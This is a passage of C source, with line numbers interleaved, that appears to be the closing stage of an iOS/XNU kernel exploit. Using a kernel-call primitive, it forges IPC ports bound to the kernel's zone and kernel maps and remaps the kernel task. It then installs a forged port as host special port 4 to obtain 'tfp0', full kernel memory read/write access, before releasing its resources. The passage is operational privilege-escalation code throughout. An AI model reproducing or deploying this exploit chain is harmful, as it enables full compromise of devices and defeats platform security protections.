ptrs[0] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1640
ptrs[1] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1641
LOG("zm_port addr: " ADDR, ptrs[0]);
1642
LOG("km_port addr: " ADDR, ptrs[1]);
1643
1644
KCALL(OFF(ipc_kobject_set), ptrs[0], zm_task_addr, IKOT_TASK, 0, 0, 0, 0);
1645
KCALL(OFF(ipc_kobject_set), ptrs[1], km_task_addr, IKOT_TASK, 0, 0, 0, 0);
1646
1647
r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
1648
LOG("copyin: %s", errstr(r));
1649
if(r != 0)
1650
{
1651
goto out;
1652
}
1653
mach_msg_type_number_t mapsNum = 0;
1654
ret = mach_ports_lookup(self, &maps, &mapsNum);
1655
LOG("mach_ports_lookup: %s", mach_error_string(ret));
1656
if(ret != KERN_SUCCESS)
1657
{
1658
goto out;
1659
}
1660
LOG("zone_map port: %x", maps[0]);
1661
LOG("kernel_map port: %x", maps[1]);
1662
if(!MACH_PORT_VALID(maps[0]) || !MACH_PORT_VALID(maps[1]))
1663
{
1664
goto out;
1665
}
1666
// Clean out the pointers without dropping refs
1667
ptrs[0] = ptrs[1] = 0;
1668
r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
1669
LOG("copyin: %s", errstr(r));
1670
if(r != 0)
1671
{
1672
goto out;
1673
}
1674
1675
mach_vm_address_t remap_addr = 0;
1676
ret = mach_vm_remap(maps[1], &remap_addr, off->sizeof_task, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, maps[0], kernel_task_addr, false, &cur, &max, VM_INHERIT_NONE);
1677
LOG("mach_vm_remap: %s", mach_error_string(ret));
1678
if(ret != KERN_SUCCESS)
1679
{
1680
goto out;
1681
}
1682
LOG("remap_addr: 0x%016llx", remap_addr);
1683
1684
ret = mach_vm_wire(realhost, maps[1], remap_addr, off->sizeof_task, VM_PROT_READ | VM_PROT_WRITE);
1685
LOG("mach_vm_wire: %s", mach_error_string(ret));
1686
if(ret != KERN_SUCCESS)
1687
{
1688
goto out;
1689
}
1690
1691
kptr_t newport = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1692
LOG("newport: " ADDR, newport);
1693
KCALL(OFF(ipc_kobject_set), newport, remap_addr, IKOT_TASK, 0, 0, 0, 0);
1694
KCALL(OFF(ipc_port_make_send), newport, 0, 0, 0, 0, 0, 0);
1695
r = KCALL(OFF(copyin), &newport, OFF(realhost) + off->realhost_special + sizeof(kptr_t) * 4, sizeof(kptr_t), 0, 0, 0, 0);
1696
LOG("copyin: %s", errstr(r));
1697
if(r != 0)
1698
{
1699
goto out;
1700
}
1701
1702
task_t kernel_task = MACH_PORT_NULL;
1703
ret = host_get_special_port(realhost, HOST_LOCAL_NODE, 4, &kernel_task);
1704
LOG("kernel_task: %x, %s", kernel_task, mach_error_string(ret));
1705
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(kernel_task))
1706
{
1707
goto out;
1708
}
1709
1710
*tfp0 = kernel_task;
1711
*kernelbase = kbase;
1712
retval = KERN_SUCCESS;
1713
1714
out:;
1715
LOG("%s", "Cleaning up...");
1716
usleep(100000); // Allow logs to propagate
1717
if(maps)
1718
{
1719
RELEASE_PORT(maps[0]);
1720
RELEASE_PORT(maps[1]);
1721
}
1722
RELEASE_PORT(fakeport);
1723
for(size_t i = 0; i < NUM_AFTER; ++i)
1724
{
1725
RELEASE_PORT(after[i]);
1726
}
1727
RELEASE_PORT(port);
1728
for(size_t i = 0; i < NUM_BEFORE; ++i)
1729
{
1730
RELEASE_PORT(before[i]);
1731
}
1732
RELEASE_PORT(realport);
1733
RELEASE_PORT(stuffport);
1734
RELEASE_PORT(client);
1735
my_mach_zone_force_gc(host);
1736
if(shmem_addr != 0)
1737
{
1738
_kernelrpc_mach_vm_deallocate_trap(self, shmem_addr, shmemsz);
1739
shmem_addr = 0;
1740
}
1741
if(dict_prep)
1742
{
1743
free(dict_prep);
1744
}
1745
if(dict_big)
1746
{
1747
free(dict_big);
1748
}
1749
if(dict_small)
1750
{
1751
free(dict_small);
1752
}
1753
if(resp)
1754
{
1755
free(resp);
1756
}
1757
1758
// Pass through error code, if existent
1759
if(retval != KERN_SUCCESS && ret != KERN_SUCCESS)
1760
{
1761
retval = ret;
1762
}
1763
return retval;
1764
}
1765
1766